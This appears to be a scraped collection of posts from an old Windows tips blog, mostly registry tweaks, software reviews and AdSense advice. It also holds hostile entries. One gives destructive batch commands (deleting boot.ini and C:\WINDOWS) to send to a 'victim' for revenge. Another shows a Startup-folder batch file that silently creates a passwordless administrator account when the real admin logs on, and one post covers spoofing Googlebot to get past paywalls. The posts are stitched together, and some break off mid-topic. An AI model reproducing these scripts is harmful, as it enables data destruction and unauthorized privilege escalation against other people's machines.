I found a very interesting post recently on Sumesh's site while I was going through my subscriptions and I liked it so much that I decided to share it with you. So many times we come across sites that demand money to show your favorite content. This becomes quite disappointing for us as we have to spend a large amount to view our favorite content, but in some of these sites we can go through our favorite content without paying any money.
This can be done if we disguise ourself as a search bot because some of these sites allow the search bots to let in without any payment to increase the hits on their sites.They detect search bots by its User Agent attribute (for Firefox, it is Mozilla 5.0), and allow only bots in. Hence you can exploit this weakness of the sites that these sites have created themselves.

The user agent defines the browser, what OS you are using, and other small bits of information.information. Switching user agent in various browsers require seperate procedure, as follows: Visit DNSStuff to know your current user agent. Visiting it gave me the following report:

Install User Agent Switcher Firefox extension and import this XML file by TechPatterns (do not click the link directly, instead right click and save) that has the required Googlebot/2.1. Once the file is loaded, configure your user agent to Googlebot 2.1
Pay sites on Internet Explorer

Change a registry entry, by opening Notepad, then copying the code below into it:

Windows Registry Editor Version 5.00 [HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=”Googlebot/2.1″ “Compatible”=”+http://www.googlebot.com/bot.html”

Save as “uagent.reg” (with the quotes). Double click on it to load the setting. You could also go to the Registry directly, but my guess is that at least some of you are not comfortable working with the Registry.

To remove the hack, copy the following code into a Notepad window and save as “originaluagent.reg” (with the quotes) and double click it:

Windows Registry Editor Version 5.00 [HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

Finally, test whether the hack has taken effect by pointing your browser to DNSStuff website. The user agent should now be “Googlebot” according to DNSStuff.

Turn keyboard to Disco

Find who is invisible on Galk

Many people now days like remain on an invisible mode on GTalk.Even today when I was online this morning my friend was invisible on Gtalk. I wanted to chat with him but I didn't know he was online to.It was later in the dy that I came to know that he was online.
One of my friends once told me that there is a way to detect who is invisible on GTalk so today I searched For the trick and found it on Vishal's blog.

The trick goes like this:

1. Set the chat as off the record with target user.

2. Open the chat window of person, whom you want to check if Invisible or Offline. Go to Options and click "Go Off Record".

3. Now send message to that user

4. If you get the message that "The user is offline and can’t receive messages right now " that means the user is offline.

5. But if you didn’t get any message that means User is online and is in invisible mode..:)

recently I had been lookin for such a free utility that will help me convert my pdf files to word documents because I wasn't able to edit the files and I needed to change them for my own purpose, until I fell upon this utility on Keith's site which gave me this free utility to convert my pdfs to word docs.

Show Hidden Folders not Working

Often because of a virus attack the Show Hidden files and Folders option in Folder Options of Windows does not work creating a big problem for those who have to keep many files hidden on their computer. I faced this problem many a times and often I had to format my PC.But now you dont need to worry the problem can be solved by making simple registry changes as shown in the following methods:

Method 1:

Go to registry editor by running regedit in the run box.
Go to this key:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced

In the right hand area, double click hidden and change the value to 1.

Now you’re all set to go. Check it in your tools menu if the changes have taken effect.

Method 2: (By Random Hajile)

1. Click “Start” -> “Run…” (or press Windows key + R)
2. Type “regedit” and click “Ok”.
3. Find the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Folder\Hidden\SHOWALL
4. Look at the “CheckedValue” key… This should be a DWORD key. If it isn’t, delete the key.
5. Create a new key called “CheckedValue” as a DWORD (hexadecimal) with a value of 1.
6. The “Show hidden files & folders” check box should now work normally. Enjoy!

Method 3:

Follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.

Step 1:Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

Step 2:variable name: moz_no_remote (should be all small letter).variable value: 1

Step 3:open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.

When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.

Help !! Unable to view Google Adsense

Hey help me....for the past few weeks I am quite worried and have tried all possible things from changing the
template to deleting posts to checking all possible solutions given by google. I am not able to view my google adsense, though my google search box is working absolutely fine.Google has not even blocked my url but still google text and image ads are not visible. Even in my other blog Kool Wallpaperz adsense is working perfectly fine and all the text and image ads are visible.

Copy/Delete Files Faster

I was fed up with the slow transfer rates even when I copied files from one partition to another on my hard-disk. Then my friend Jay suggested TeraCopy which does the same work faster. Later on I came across two more similar utilities called BurstCopy and FastCopy.

1. TeraCopy

TeraCopy is a free utility designed to copy/move files faster and more secure. TeraCopy can resume broken file transfers. TeraCopy skips bad files during copy and even shows the skipped files at the end of files transfer. Calculates files CRC checksum on the fly to speed up source and target files comparison. Seamless integration with Windows Explorer allows you to keep working with files as usual.

Version 1.1 adds the ability to create a copy of a folder by copying and pasting at the same location and a few minor bugfixes.

2. BurstCopy

BurstCopy gives you faster file transfer speeds in Windows. It gives the ability to Pause/Resume file transfers. It comes with 12 different languages and skin support.

BurstCopy comes as a shareware version, to use it fully you must register the software.

3. FastCopy

This is my favorite media player.I love the features of this player mainly the volume controls and the seek time feature.
For those who are unaware of VLC, let me give you a brief introduction.VLC media player is a free software media player written by the VideoLAN project.

VLC media player is a highly portable multimedia player for various audio and video formats (MPEG-1, MPEG-2, MPEG-4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols. VLC can also be used as a server to stream in unicast or multicast in IPv4 or IPv6 on a high-bandwidth network.

VLC includes a large number of free decoding and encoding libraries; on the Windows platform, this greatly reduces the need for finding/calibrating proprietary plugins. Many of VLC’s codecs are provided by the libavcodec library from the FFmpeg project, but it uses mainly its own muxer and demuxers. It also gained distinction as the first player to support playback of encrypted DVDs on Linux by using the libdvdcss DVD decryption library.

I recently got a windows 7 theme through Tech Yard and installed it on my PC. Believe me its really cool and I loved it.For this Cool theme I would definitely like to thank Avinash.

Create Your Own Virus

I always thought what is a virus and how is it made and will I ever be able to create one. Slowly I came to know about it and when I was going through a post on one of my favorite blogs I found out a technique to create a virus within 5 Minutes.
All you need to create these viruses are a simple notepad. Here is a way to create a virus that may crash your hard disk.

1) Open ur notepad n type the following.........
type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by any name]
create the notepad in c: drive...

2)Now, to test it, create a textfile called TEST.txt(empty)
in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:Go to Notpad and
type erase C:\WINDOWS (or C:\LINUX if you have linux) and
save it again as findoutaname.cmd.
Now DON'T run the file or you'll lose your WINDOWS map.
So, that's the virus. Now to take revenge.
Send you file to your victim.
Once she/he opens it. Her/his WINDOWS/LINUX map is gone.
And have to install LINUX/WINDOWS again.
Simple explanation:Go to notepad, type erase C:\WINDOWS, save,
send to victim, once the victim opens it,
the map WINDOWS will be gone and have to install WINDOWS again...

CAUTION: This may crash your Hard disk....so don't try this on your computer...

Have you ever thought of changing the title of your web browser? If not will you like to do that and give a browser your own name?
I did it and made it Microsoft Internet Explorer by Himanshu. Like my earlier post Watch Movies in MS Paint this tweak can be used to impress your friends.

This tweak Customize the Title of the Internet Explorer.

1. Click Start > Run > Type gpedit.msc
2. Click User Configuration > Windows Setting > Internet Explorer Maintenance > Browser User Interface
3. Double click on Browser Title
4. Click on Customize Title Bars
5. type in whatever you want
6. Click OK

Now you changed the title of your browser and you sure see what you wrote when you
open a New Widow.

Watch movies in MSPaint

Hey maybe some of you might know about this trick but if you don't know then here is a cool tip of playing movies in Ms Paint.Though you don't require to do that but it might help you make an impression on your friends.

Here is how to do that:

1-First open any movie in a player [I used windows media player]

2-Take a full screen capture with print screen key which is near to F12 key.

3-Open MS Paint

4-Hit Ctrl+V or got to Edit>>Paste.

The controls will not work here and don’t minimize the original movie window or it will stop working. What it does is actually copy from the original source, nothing special. But at least enough to drop jaws of others.

Remove any item permanently from a webpage

Some time back I came across this addon and thought what a great addon to remove any unwanted item on a webpage permanently. But when I came across this addon , I had upgraded to Firefox 3 and this addon was incompatible with with the new version. Though I found a solution to make addons compatible with the older versions. Mozilla has also come out with a latest version of this addon called Remove It Permanently(RIP) addon which is well supported by Firefox 3.

Rip (Remove it Permanently) provides the ability to point at and remove permanently any item you can select. It provide a flexible and easily configurable solution to removing unwanted content from a web page.Elements can be pretty much anything from headers, images, advertisement, forms to flash content.

Two new right-click entries appear after installing the add-on for Firefox,. The first entry, Remove This Permanently, removes the selected element from the current page. If you remove the Google logo from a search it will still appear on a different search. This method is pretty good for quickly removing elements on a website that you visit regularly and that does not have changing addresses.

The second entry Rip Advanced offers advanced features that make it possible to remove elements from a single page, all similar pages, the website and the full domain. That’s not all however. You can also remove all similar items in one go, remove the parent element, all parent elements, all frames and Google Adsense.

If you've ever looked at a site and wished you could get rid of some unsightly image or an element that throws off the flow of a site, just right-click it with RIP and remove it permanently. You can select to remove it from that page only, all similar pages, from the web site, or from the entire domain—in addition to a few other options.

Replace My Pictures and My Music shorcuts in Start Menu

Today I came across two very good vbscripts that will customize your Start Menu.I always felt that the My Music and My Pictures shortcut in the Start Menu are useless for me because I never store anything in these two folders. But these two shortcuts were present in the start menu by default, so I was feeling helpless in this case as I wa snot finding an appropraite way to repalce them with other items.But these two VB scripts helped me solve my problem.
These scripts change the registry settings of your Start Menu.

All you have to do to customize your Start Menu is to save the two script files- replace My Pictures VB script and the replace My Music VB script by right-clicking each link on your PC, then double-click to run them. Enter the new path you want to appear in your Start Menu (even a network location, like to a shared music folder), and then you have to log off and back into your PC to see your changes.

Shutdown XP Faster

When a user shuts down Windows XP, first the system has to kill all services
currently running. Every once in a while the service does not shut down
instantly and windows gives it a change to shut down on its own before it kills it.
This amount of time that windows waits is stored in the system registry.
If you modify this setting, then windows will kill the service earlier. To modify
the setting, follow the directions below:

Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).

Increase Vista Boot Speed

Follow the steps given below to increase Vista boot speed.

Click on the Boot tab, then click Advanced options:

Minimize Open windows to thumbnails

A couple of weeks back I wrote about a software MINIMIZE that minimized your running application windows as a thumbnail on your desktop. But the software worked only for windows XP. But I have found a similiar software for windows Vista users also.
The software is called THUMBWIN.

When you hit the minimize tab on any program in Windows, your application will disappear into the taskbar. But if you've got more than a few applications hiding out in your taskbar, it can be kind of tough to find the program you're looking for.

ThumbWin gives your minimized windows a bit more visual information. Once you install and run this tiny application, any time you minimize a window, a thumbnail will be created on your desktop. You can click the thumbnail to maximize a window, or click the close button on a thumbnail to exit a program.

I found a very handy application that lets you view images in zip files without extracting them. It’s called Inzomia Viewer.

But let me tell you that
With the Inzomia viewer you can view images in compressed zip files just as you would any image.

Export the Feeds from a Google Reader Folder

Most feed readers let you import and export subscriptions using the OPML format. For Google Reader, you'll find this option in Settings > Import/Export.

But what happens when you need to export the feeds from a single folder so you can share them with a friend or upload them to a site? Google Reader lets you export the feeds from a folder:

(you should replace FOLDER with the actual name of the folder)

Another way to share the subscriptions from a folder is to make it public and to use this link for the OPML file:

http://www.google.com/reader/public/subscriptions/user/USERID/label/FOLDER
(USERID can be obtained from the public page created by Google Reader)

This also works if someone shares with you the page of a public folder and you want to obtain the list of subscriptions from that folder. If I share with you my Googlers folder:

Disable Task Manager

Usually system administrators need to keep the systems with their control. Either it is for data safety or for system safety. In such a way here it is an option for disabling the task manager by Registry and Group Policy Editor.
First we look at the Registry Editor. To disable the Task Manager follow the following steps carefully.

1. Start Regedit Through Run Command
2. Click Start
3. Select Run Command
4. Type Regedit
5. Click OK
Hive: HKEY_CURRENT_USER
Key: Software\Microsoft\Windows\CurrentVersion\Policies\System
Name: DisableTaskMgr
Type: REG_DWORD
Value: 1=Enable this key, that is DISABLE TaskManager
Value: 0=Disable this key, that is Don’t Disable, Enable TaskManager
Always it is very danger to edit and restrict the users with Registry Editor. As the improvement in Microsoft goes up high some enhanced facilities are making the Operating Systems user friendly. In such a way Windows 2000 and Windows XP are having the same facilities such as Group Policy Editor. By this

editor we can easily restrict the user from accessing the files, folders and drive etc.., If we would have to rearrange the group policy we can not do it unless we re-authenticate the domain.
Editing by the Group Policy Editor.
1. Click Start
2. Click Run
3. Enter gpedit.msc in the Open box and click OK
4. In the Group Policy settings window
5. Select User Configuration
6. Select Administrative Templates
7. Select System
8. Select Ctrl+Alt+Delete options
9. Select Remove Task Manager
10. Double-click the Remove Task Manager option
Do the same as mentioned above to enable the task manager.

Use Mouse Scroll in a Best way in Firefox

I am an avid fan of Firefox and always keep on searching new tricks to make it better and better for me.I found this piece on TechDreams and found out how to easily use mouse scroll to perform various tasks in a quick and easy way.

1. Moving Back & Forward

Hold the shift key and move the mouse scroll while up and down to move back and forward of the browser history respectively.

2. Close a tab page without even displaying it

Popup ads of yesterday are new tab page ads of today. Few annoying web sites keeps opening popup adds as new tab pages. At times we don’t even want to see what is there in the unwanted tab and close it. Mouse scroll wheels come handy to deal with this situation. Just hover the mouse on the unwanted tab and click using mouse scroll wheel. The tab will be closed immediately.

3. Opening links in a new tab

To open any link on a new tab page just click it using the mouse scroll wheel. In the background Firefox silently opens the link in a new tab page.

4. Scroll line by line while reading a web page

This is the very useful functionality for those who read lot of stuff online. Hold the Alt key while scrolling the page using mouse scroll wheel to move it line by line. This come very handy while you need to scan text line by line.

5. Zoom In and Out images/text

Use CTRL + Mouse Scroll wheel to zoom in and out a web page

6. Scrolling though the tabs

If you open many tabs then Firefox adds a tab scroll as it runs out of space to show all the tabs. The general way of scrolling through the tabs is to use the arrows Firefox displays on the edges of tab area. The quickest way to scroll through the tabs is to use mouse scroll. Place the mouse scroll on any tab and move it up and down to scroll through the pages

7. Open a folder of bookmarks with a single click

Bookmark toolbar of Firefox is very handy to create bookmarks of the favourite web sites that we browse often. The bookmark tool bar also allows us to create folder and group the bookmarks under them. If you click on a folder with mouse scroll wheel, Firefox opens all the bookmarks of the folder in tab pages.

Google Adsense below Post Title not Allowed

Most blogs place Google Adsense Ads below the post title and above article content, to get better ad visibility and a higher clickthrough rate to make more money, but it is not always allowed as per Google Adsense policies. We recently got an email from Adsense support pointing out this issue on our site.
Google had earlier clarified some commonly encountered issues and one of them was “Ads shouldn’t be placed under a title or section heading in a way that implies that the ads are not ads.” They showed this example violating the terms, where the ads are places directly below the post title.

Also note that Google Adsense program policies, clearly say that Publishers participating in the AdSense program -

May not encourage users to click the Google ads by using phrases such as “click the ads,” “support us,” “visit these links,” or other similar language
May not place misleading labels above Google ad units - for instance, ads may be labeled “Sponsored Links” but not “Favorite Sites”

Posts title can violate Adsense Guidelines

Post titles act as labels - If you have posts titles like “Hot deals of the day”, or “Best Articles of June”, or “3 best imaging softwares”, or “download vista now”, then the targeted ads that appear beneath these articles can truly mislead visitors to click these ads and inflate advertiser costs.
Blogs are different - But since bloggers place the adsense code in the blog template, it is difficult to tweak the placement on every post. Of course you can change selected titles so that it has a lesser clicking impact, but it is diffcult to optimize hundreds of article titles.
What can you do - Most blogs insert Date and Categories beneath the Post title which separate the ads. But apparently this is not enough, as they informed me that the title can still mislead visitors to click. They advised that “publishers may not label the Google ads with text other than ’sponsored links’ or ‘advertisements’. Inadvertently the blog post titles were acting as a labels above the ads. Thus to comply with the terms, we had to introduce the word “Advertisements” over our Adsense units, when they cleared the issue.
Its too common - As I browse around popular blogs, there are many blogs that place ads directly under titles, or place title, date and categories above the ads. This has obviously been inspired by the Adsense optimization chart which prompts you to place ads above your primary content.
I thank the Google enforcement team, which was kind enough to send prompt feedback and helped us fix the issue. This is another of the common adsense mistakes to avoid and its a good idea to fix it before Google comes calling…
Will Google ban your adsense account? Once the Adsense team identifies a problem in Adsense placement on your site, they usually send an email explaining the issue and give you a few days time to fix it. It is best to respond quickly and politely and fix the issue promptly. The Adsense team is very helpful, but you have to comply with their terms.

Translation bots

Translation bots are described by Google as pieces of software that act as chat contacts and provide some fun or useful functionality. Whenever you need to translate any word or sentence from one language to another, you can send that as a message to one of the appropriate Google Chat translation bots. The bot then acts as a translator and replies to the translated version of your message. Of course you need to add the translation bot as your GTalk contact beforehand.
Currently there are 50 bots available in two language pairs. The names of the bots have been made of two letter abbreviations of languages, the English to French translation bot is ‘en2fr.’ To add the bots as contacts, you simple need to add the email of the specific bot in this format: name_of_the_bot@bot.talk.google.com. For example, for English to French bot, it’s ‘en2fr@bot.talk.google.com.’
Transliteration bots

Transliteration bots are somewhat similar to translation bots, but here they convert English sentences to scripts of various Indian languages like Hindi, Kannada, Malayalam, Tamil, and Telugu. You can add the bots using their names ‘en2hi’.translit, ‘en2kn.translit,’ ‘en2ml.translit,’ ‘en2ta.translit,’ and ‘en2te.translit,’ ending with ‘@bot.talk.google.com’.
Chatback Badge

Chatback badge is a nice little tool from Google that you can use to chat with non-Google users. How to force Firefox extensions to be "compatible"

One thing that has troubled firefox users after upgrading to firefox 3 is that they are not able to install some of the addons that say the the "addon is incompatible with firefox 3".
But now there is a little tweak that may help firefox users out of this problem.

First you need to type "about:config" in the URL bar in Firefox 3. Note: no quotes when typing this. You'll be warned that you're mucking about with the settings. Just click the "I'll be careful, I promise!" button and you'll see tons of application preferences.

The one you want actually isn't there, so don't bother looking for it. Instead, right click to create a New, Boolean preference. Type "extensions.checkCompatibility" (again, no quotes) as your preference and then choose the value of False for it. Restart Firefox and you should be able to install any Firefox extension.

This doesn't mean that your older extension will work perfectly; after all, it was designed for Firefox 2 or earlier. However, you can at least install and try it. In fact, my gut tells me that this preference is to aid extension developers, which is why it's not included by default.

Remember that you could hose up your Firefox settings and behavior with these types of tweaks, so if you're not willing to take and accept that risk, stay away from "about:config".

Another Firefox Extension!! huh! Firefox does know how to make the job of its users easier and easier.This one is supposed to be the best extensions by firefox until now.
It basically allows you to play videos from your favorite video sites such as YouTube, DailyMotion, MetaCafe, MySpace right from within your Firefox sidebar.
In short, YouPlayer is a video player with playlist which works on Firefox sidebar while you are surfing the Internet on the right.
Users can make a playlist of videos and watch them while surfing the web. The reason I love this extension is because it kills the limitation of staying on a browser window to watch a video and allows you to enjoy it virtually anywhere you go.

How To Use YouPlayer

Firstly, install YouPlayer Firefox add-on. Upon installation, click on “YP” on the bottom right side in your Firefox browser.
To start to watch an online video, you can click on “Search” button in YouPlayer to search a video in YouTube, Google Video, Metacafe, DailyMotion or MySpace.
You may drag and drop a link or local files from hard drive into a playlist window. When you double-click of it, it will be loaded in the video window.
You can save the playlist and make it work as a bookmarker so you can always continue to watch the unfinished video in your playlist.

You know how much I love to read about new cars.I loved this piece on vhxn about the future car concepts where you can fold the cars as you like as well.
Transportation design students at Turin-Based IED have developed a new model car in partnership with BMW for creating a language evolution car at 2015.

This car got an award for Unseen Technology at the interior motives design award 2007, the designer of the car is Matúš Procháczka from Slovak. This car has two technologies in one vehicle. This car uses a polarity electric engine to ride in the road. In additional this car will require the roads to be made of huge concrete panels with magnets formed in them.

This Royal College of Art Concept Cars is designed by fourteen postgraduate car designers. These students competing for the 2008 Pilkington automotive award, their projects ranged from a fresh take on eco-design to find the new ways of expressing personalization.

IPMessage.net is a concept which allows you to send a message to any ip address . The message itself doesn't go to that ip address but when the person with that IP visits the same site he sees the message displayed for him. The idea is simple and pretty unique as it not only tells your IP but also allows you to send message which you can use it for private or secret message. I am not sure if this is going to work if somebody is using proxy.

Interesting web app where you can leave messages to any IP address. The idea behind it is that you type a message and sort of password protect using some IP address. Only the person with that IP address will be able to see the message.

Circle Dock 2.0

There are lots of dock application for Windows similar to the one in Mac, but these are always docked towards one side and is mostly in rectangle. Here is a new concept of docking- Circle Dock. Circle Dock is an open source application, so you are free to modify the code. The idea behind Circle Dock is that the dock should appear where your mouse is instead of you having to move your mouse to the dock like with other programs. This is accomplished by making the dock a circular or spiral shape so that it can be placed anywhere, even near the edge of the screen. The offscreen portions of the dock are easily reached by just scrolling with your mouse wheel or arrow keys.
Circle Dock has a ton of visual customization options as well. You can either display your icons in concentric circles, or as a spiral. You can add a rotating animation effect to the spiral to make yourself dizzy. There are a more than 30 skins to choose from. And you can decide whether the dock is always visible or if it disappears when the program loses focus or when you click an application icon. One other feature which I wish every application launcher had (and which many, but not all, do have) is the ability to select from a handful of keyboard shortcuts to show or hide the dock.

This is a lot different from the conventional docks we’re used to seeing, but it makes a lot of sense. Here are some of the features it has:

Drag and drop your files, folders, and shortcuts onto a circular or spiral dock.
Rotate the dock with either your mouse wheel or the keyboard arrow keys.
Change the image shown for the icons and change the skins (compatible with icons and skins for Rocket Dock, Object Dock, etc.)
Ability to run the program from a portable USB memory stick and have the links in the dock point to the documents on the USB memory stick.
Ability to synchronize the links on the dock with the files, folders, and shortcuts on your desktop or other folders in real-time.
The dock appears where your mouse is by pressing a hotkey.
Works on computers with multiple monitors.

Fix Chech Disk Error At startup

Most of you might be aware of the problem I am talking about.Mainly this problem is due to the fact that the drive partition is in FAT32 form rather than in NTFS form. It may also be caused due to a virus as in my case.I have faced this problem every time I switched on my system and was sick of it.o I decided to cure and found a satisfactory answer by Sensible Guy.

There are 2 methods disable disk checking at Windows startup. and read below to know.

Method 1:Registry Editing

To disable go to the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager

In the right hand pane, double click BootExecute.

The default value of the key is autocheck autochk *

* means every drive is checked for consistency. Just add /K:C at the end before *. /K switch will disable autocheck on C: drive at Windows startup. So the final value should look like this:

autocheck autochk /k:C *

If you want to add more drives, the key should look like this: (disabling C and D drives)

autocheck autochk /k:C /k:D *

If you want to restore everything to default, just replace the key with the default one i.e.,

autocheck autochk *

Method 2: CHKNTFS

go to Start –> Run –> cmd.

If you want to disable check disk on C: drive, use the following command on command prompt.

chkntfs /X C:

If you want to disable check disk on two or more drives, just keep on adding the drives:

chkntfs /X C: D: E:

This will disable check disk on C, D and E drives.

If you want to restore what you have done, that is, enable automatic disk checking on all the drives again, just run the following command:

chkntfs /D

This will restore all the drives to automatic disk checkup.

It takes long as all get out if you’re trying to dial a number during a frantic moment, so I would reserve this for casual calls and those who love to do things extreeeeemely slow. After all, you will need to turn each individual section to the correct number before the haptic technology provides a confirmation, so imagine performing an international call. That’s a whole lot of sections to turn, and by the time you’re done, your relief is turned into frustration as you’re redirected to the voice mail instead. Good thing it comes with a vibration function though, but that ought to work well only if it has waterproof capability.

2. Four out of 10 Silicon Valley startups are run by Indians.
3. With 800 movies per year, India's film industry overshadows Hollywood.
4. The organized lottery market in India is US$7bn (2% of GDP).
5. India consumes a fifth of the world's gold output.
6. Indians account for 45% of H1-B visas issued by the US every year.
7. Growing at 6%, in 25 years Indian GDP on a PPP basis will be at the same level the US is at today.
8. Six Indian ladies have won Miss Universe/Miss World titles over the past 10 years. No other country has won more than twice.
11. Bank deposits in India roughly equal 50% of its GDP OE again, among the highest in the world.

It was always going to come. A Robot with a biological brain !! Yes you read it right a robot with a biological brain has been made by a multidisciplinary team at the University of Reading.
This is no ordinary robot control system - a plain old microchip connected to a circuit board. Instead, the controller nestles inside a small pot containing a pink broth of nutrients and antibiotics. Inside that pot, some 300,000 rat neurons have made - and continue to make - connections with each other.

The brain consists of a collection of neurons cultured on a Multi Electrode Array (MEA). It communicates and controls the robot via a Bluetooth connection.The robot’s biological brain is made up of cultured neurons which are placed onto a multi electrode array (MEA). The MEA is a dish with approximately 60 electrodes which pick up the electrical signals generated by the cells. This is then used to drive the movement of the robot. Every time the robot nears an object, signals are directed to stimulate the brain by means of the electrodes. In response, the brain’s output is used to drive the wheels of the robot, left and right, so that it moves around in an attempt to avoid hitting objects. The robot has no additional control from a human or a computer, its sole means of control is from its own brain.
The researchers are now working towards getting the robot to learn by applying different signals as it moves into predefined positions. It is hoped that as the learning progresses, it will be possible to witness how memories manifest themselves in the brain when the robot revisits familiar territory.

Here's a neat little trick I just came across over at FiddyP, it's not really a hack, just a simple code, a line of javascript that anyone can use without needing to know how it works. Without even needing me to explain it, the picture below pretty much describes it...

All you got to do is just copy and paste the following code into your browser address bar whenever you see an asterisked form field and press enter...

My friend Anubhav who recently had a trouble on his Laptop that he wasn't able to view the folder names in Vista drive is in trouble again.He hasnt used Vista much and that is why he falls in trouble quite often and then asks me to solve his problem.
This time he was not able to view pictures in thumbnail view which can be solved in the following two ways I found out on BauerPower.
The first way, you do the following within the folder you meant to view thumbnails in:

Click on Organize > Folder and Search Options
Click the View Tab
Uncheck the "Always show icons, never thumbnails" option
Click Apply, then OK.

The other option is to:

Click Start > Contol Panel
In classic view, click on Folder Options
Click the View Tab
Uncheck the "Always show icons, never thumbnails" option
Click Apply, then OK.

Yes you read it right.I got this information from Amit's website that the size of desktop icons can now be changed by mouse's roll by a very simple method as follows:

Left-click anywhere on the desktop, hold the ‘Control’ key and move the scroll wheel on the mouse - the desktop icons will grow smaller or larger depending upon the direction of your scroll.

But this feature is just applicable in Windows Vista and not in Windows XP.

Disable/Enable shutdown in start menu

Here is the step by step procedure you need to follow to enable or disable the shutdown/ turn off from start menu or task manager or even from windows security dialog box.

1. Click Start > Run.

2. Type gpedit.msc and press enter to open the group policy editor.

3. Under the User Configuration, goto Administrative templates and further move on to Start Menu and Taskbar.

Under t hat menu, find Remove and prevent access to Shut Down command, double click on that to open a setting dialog box.

Set it to enabled to disable the turn off option on your windows.
Set it to disabled to enable the turn off option on your windows.

Setting for Log off option:

Follow the same procedure as above, but choose Remove Logoff on start menu in step 4.

Here is the explanation for Remove and prevent access to shut down command as provided by Microsoft:

Prevents users from shutting down or restarting Windows.

This setting removes the Shut Down option from the Start menu and disables the Shut Down button on the Windows Security dialog box, which appears when you press CTRL+ALT+DEL.

This setting prevents users from using the Windows user interface to shut down the system, although it does not prevent them from running programs that shut down Windows.

If you disable this setting or do not configure it, the Shut Down menu option appears, and the Shut Down button is enabled.

Note: It is a requirement for third-party applications with Windows 2000 or later certification to adhere to this setting.

And the below one for Remove logoff from start menu:

Removes the "Log Off " item from the Start menu and prevents users from restoring it.

If you enable this setting, the Log Off item does not appear in the Start menu. This setting also removes the Display Logoff item from Start Menu Options. As a result, users cannot restore the Log Off item to the Start Menu.

If you disable this setting or do not configure it, users can use the Display Logoff item to add and remove the Log Off item.

This setting affects the Start menu only. It does not affect the Log Off item on the Windows Security dialog box that appears when you press Ctrl+Alt+Del, and it does not prevent users from using other methods to log off.

Tip: To add or remove the Log Off item on a computer, click Start, click Settings, click Taskbar and Start Menu, click the Start Menu Options tab and, in the Start Menu Settings box, click Display Logoff.

Set time limit for your users in XP

I loved his info on Tech-Reciepies.com because it is extremely useful for a guy like me who lives in hostel and who has so many users of his computer. Setting a time limit helps me a lot and restricts other people overusing my computer.

The method is a very simple one and just have to type a simple command on the command prompt.

1. Open a command prompt.

2. Execute the following command:

net user /time:M-F,9AM-9PM

where username is the name of the user you wish to limit. The days can be modified using M,T,W,Th,F,Sa and Su. The time can also be changed but must be in hourly increments.

You can also use different times for each day:

net user /time:M,-F,9AM-9PM;Sa,9AM-10PM;Su,12PM-8PM

Missing files and folder names in Vista

Yesterday my friend Anubhav was faced with a problem in Vista installed on his laptpop. The problem was that all of the folder-names and file-names were missing in large folder view under my drive in Vista. Strange ? huh. Take a look at the following snapshot.

That is always happened when we hold the SHIFT key while we’re opening the drive or folder in Vista. To solve this problem, follow the steps.

1. Switch to detail view.

2. Hold down SHIFT key and change to “Medium Icons”.

3. Close the Explorer and re-open it again. There you’ll get your folder names and file names back.

Finally!!I had to suffer this problem as well because of which I had to format my harddisk but now you dont have to face any trouble becausehere is the solution to one of the bigger problems of today - orkut is banned error.
Tosday orkut is one of the most well known social networking website.So when such a bug haunts you you get into a deep trouble and get cutoff with your online friends.
But with the solution you need not worry.
This happens because of “Heap41a / win32.USBworm” virus.

This virus can easily spread through removable storage devices especially USB drive. To fix this trouble follow the instruction
1. Open the task manager by pressing Ctrl + Alt + Del
2. Go to “Processes” tab….

3. Look for services name with “svchost.exe”. There will be many namesakes. You have
to look at the name with log in user name.
4. If you find that just delete it or give end process button. It will confirm the process
accept it.
5. Now go to “regedit” from run and navigate the following keys.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current
Version\Policies\Explorer\Run
6. Look for a key in right side pane with the name “Winlogon”. This will have
“heap41a\svchost.exe” in its value field and delete the file.
7. Now navigate the following key.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current
Version\explorer\Advanced\Folder\Hidden\SHOWALL
And in right-side pane, change value of “CheckedValue” to 1
8. Now enable “Show Hidden Files/Folders” option in “Tools -> Folder Options” in
My Computer.
9. Right-click on Start button and select “Open“. Now open “Programs” folder, here you’ll see a folder “Startup“. Open it and if you get a hidden file there, delete it. If its not there, then close it.
10. At last open “My Computer” and open C: drive. Disable “Hide Protected System files” option in “Tools -> Folder Options“.
11. Check the folder “heap41a” in C: drive. Delete it.
12. Reboot the system then your problem will be fixed.

Create Administrator Account using Guest Account

I was wondering if this was possible. and oh yes it is possible. but the PC in which you want to create an admin account, an administrator who logs on regularly must be present. ( I mean someone with an administrator account must log in ) This process can be divided in to .... lets say about 5 steps. and here are the cools 5 steps to create your own admin account:

1. Right click desktop NEW> Text Document

2.Write the following in the notepad
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

3.save the file and rename it to what ever you want with the extention .bat

4.Copy the file to the Startup folder. Here is the path to the Startup folder:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

5.The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.

Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.

Hope this helped someone who needs an admin a/C.
